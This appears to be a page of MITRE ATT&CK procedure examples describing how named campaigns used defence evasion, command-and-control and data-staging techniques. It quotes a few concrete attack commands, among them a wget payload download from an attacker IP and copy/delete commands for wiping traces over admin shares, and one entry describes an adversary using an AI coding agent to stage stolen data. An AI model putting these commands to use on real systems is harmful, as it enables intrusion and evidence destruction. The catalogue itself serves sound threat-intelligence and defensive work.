ATT&CKProcedure examples

Procedure examples

Real-world descriptions of how a group, tool or campaign used a technique.

1146 examples

TechniqueUsed byProcedure example
T1070.004
File Deletion
CampaignKV Botnet Activity

KV Botnet Activity removes on-disk copies of tools and other artifacts after it the primary botnet payload has been loaded into memory on the victim device.

T1070.004
File Deletion
CampaignRedPenguin

During RedPenguin, UNC3886 used malware capaple of removing scripts after execution.

T1070.004
File Deletion
CampaignOperation Honeybee

During Operation Honeybee, the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files.

T1070.004
File Deletion
Campaign2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, vba_macro.exe deletes itself after `FONTCACHE.DAT`, `rundll32.exe`, and the associated .lnk file is delivered.

T1070.004
File Deletion
CampaignCutting Edge

During Cutting Edge, threat actors deleted `/tmp/test1.txt` on compromised Ivanti Connect Secure VPNs which was used to hold stolen configuration and cache files.

T1070.004
File Deletion
CampaignOperation Digital Eye

During Operation Digital Eye, threat actors deleted files delivered to compromised hosts, often named with the pattern do.* such as do.exe.

T1070.004
File Deletion
CampaignC0032

During the C0032 campaign, TEMP.Veles routinely deleted tools, logs, and other files after they were finished with them.

T1070.004
File Deletion
CampaignSolarWinds Compromise

During the SolarWinds Compromise, APT29 routinely removed their tools, including custom backdoors, once remote access was achieved.

T1070.004
File Deletion
CampaignOperation AkaiRyū

During Operation AkaiRyū, MirrorFace deleted delivered tools and files from compromised hosts.

T1070.004
File Deletion
CampaignArcaneDoor

ArcaneDoor included multiple instances of file deletion or removal during execution and other adversary actions.

T1070.004
File Deletion
CampaignAPT41 DUST

APT41 DUST deleted various artifacts from victim systems following use.

T1070.004
File Deletion
CampaignOperation Wocao

During Operation Wocao, the threat actors consistently removed traces of their activity by first overwriting a file using `/c cd /d c:\windows\temp\ & copy \\<IP ADDRESS>\c$\windows\system32\devmgr.dll \\<IP ADDRESS>\c$\windows\temp\LMAKSW.ps1 /y` and then deleting the overwritten file using `/c cd /d c:\windows\temp\ & del \\<IP ADDRESS>\c$\windows\temp\LMAKSW.ps1`.

T1070.006
Timestomp
CampaignCutting Edge

During Cutting Edge, threat actors changed timestamps of multiple files on compromised Ivanti Secure Connect VPNs to conceal malicious activity.

T1070.006
Timestomp
CampaignC0032

During the C0032 campaign, TEMP.Veles used timestomping to modify the $STANDARD_INFORMATION attribute on tools.

T1070.006
Timestomp
CampaignSolarWinds Compromise

During the SolarWinds Compromise, APT29 modified timestamps of backdoors to match legitimate Windows files.

T1070.007
Clear Network Connection History and Configurations
CampaignRedPenguin

During RedPenguin, UNC3886 used an implant to delete logs associated with unauthorized access to targeted Junos OS devices.

T1070.008
Clear Mailbox Data
CampaignSolarWinds Compromise

During the SolarWinds Compromise, APT29 removed evidence of email export requests using `Remove-MailboxExportRequest`.

T1071
Application Layer Protocol
CampaignFrostyGoop Incident

During FrostyGoop Incident, the adversary initiated Layer Two Tunnelling Protocol (L2TP) connections to Moscow-based IP addresses.

T1071.001
Web Protocols
CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.

T1071.001
Web Protocols
CampaignSharePoint ToolShell Exploitation

During SharePoint ToolShell Exploitation, threat actors issued HTTP `POST` requests to web shells with spoofed or empty Referrer headers, to circumvent authorization controls.

T1071.001
Web Protocols
CampaignFrankenstein

During Frankenstein, the threat actors used HTTP GET requests for C2.

T1071.001
Web Protocols
CampaignRedDelta Modified PlugX Infection Chain Operations

Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations.

T1071.001
Web Protocols
CampaignOperation MidnightEclipse

During Operation MidnightEclipse, threat actors used `wget` via HTTP to retrieve payloads.

T1071.001
Web Protocols
Campaign2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests.

T1071.001
Web Protocols
CampaignIndian Critical Infrastructure Intrusions

During Indian Critical Infrastructure Intrusions, RedEcho network activity included SSL traffic over TCP 443 and HTTP traffic over non-standard ports.

T1071.001
Web Protocols
Campaign3CX Supply Chain Attack

During the 3CX Supply Chain Attack, AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS. Cookies also contain hardcoded variables `__tutma` or `__tutmc` in the payload's HTTPS request.

T1071.001
Web Protocols
CampaignC0018

During C0018, the threat actors used HTTP for C2 communications.

T1071.001
Web Protocols
CampaignC0021

During C0021, the threat actors used HTTP for some of their C2 communications.

T1071.001
Web Protocols
CampaignJuicy Mix

During Juicy Mix, OilRig used a VBS script to send POST requests to register installed malware with C2.

T1071.001
Web Protocols
CampaignSolarWinds Compromise

During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.

T1071.001
Web Protocols
CampaignOperation CuckooBees

During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.

T1071.001
Web Protocols
CampaignOuter Space

During Outer Space, OilRig used HTTP to communicate between installed backdoors and compromised servers including via the Microsoft Exchange Web Services API.

T1071.001
Web Protocols
CampaignArcaneDoor

ArcaneDoor command and control activity was conducted through HTTP.

T1071.001
Web Protocols
CampaignAPT41 DUST

APT41 DUST used HTTPS for command and control.

T1071.001
Web Protocols
CampaignNight Dragon

During Night Dragon, threat actors used HTTP for C2.

T1071.001
Web Protocols
CampaignVersa Director Zero Day Exploitation

Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers.

T1071.001
Web Protocols
CampaignOperation Wocao

During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.

T1071.001
Web Protocols
CampaignC0017

During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.

T1071.001
Web Protocols
CampaignQuad7 Activity

Quad7 Activity has used the same User Agents of Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko and Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 combined with a reference to the Microsoft Azure PowerShell Application ID 1950a258-227b-4e31-a9cf-717495945fc2 in their sign-in attempts.

T1071.002
File Transfer Protocols
CampaignOperation Honeybee

During Operation Honeybee, the threat actors had the ability to use FTP for C2.

T1071.002
File Transfer Protocols
CampaignQuad7 Activity

Quad7 Activity has used a File Transfer Protocol (FTP) server to download malicious binaries.

T1071.004
DNS
CampaignCutting Edge

During Cutting Edge, threat actors used DNS to tunnel IPv4 C2 traffic.

T1072
Software Deployment Tools
CampaignC0018

During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network.

T1074.001
Local Data Staging
CampaignSharePoint ToolShell Exploitation

During SharePoint ToolShell Exploitation, threat actors staged stolen data from web.config files to debug_dev.js.

T1074.001
Local Data Staging
CampaignOperation Honeybee

During Operation Honeybee, stolen data was copied into a text file using the format `From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt` prior to compression, encoding, and exfiltration.

T1074.001
Local Data Staging
CampaignOperation MidnightEclipse

During Operation MidnightEclipse, threat actors copied files to the web application folder on compromised devices for exfiltration.

T1074.001
Local Data Staging
CampaignAnthropic AI-orchestrated Campaign

During the Anthropic AI-orchestrated Campaign, the adversary used Claude Code to stage extracted data and operational documentation in structured markdown files on local systems prior to exfiltration.

T1074.001
Local Data Staging
CampaignC0015

During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.

T1074.001
Local Data Staging
CampaignJuicy Mix

During Juicy Mix, OilRig used browser data and credential stealer tools to stage stolen files named Cupdate, Eupdate, and IUpdate in the %TEMP% directory.

T1074.001
Local Data Staging
CampaignC0032

During the C0032 campaign, TEMP.Veles used staging folders that are infrequently used by legitimate users or processes to store data for exfiltration and tool deployment.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.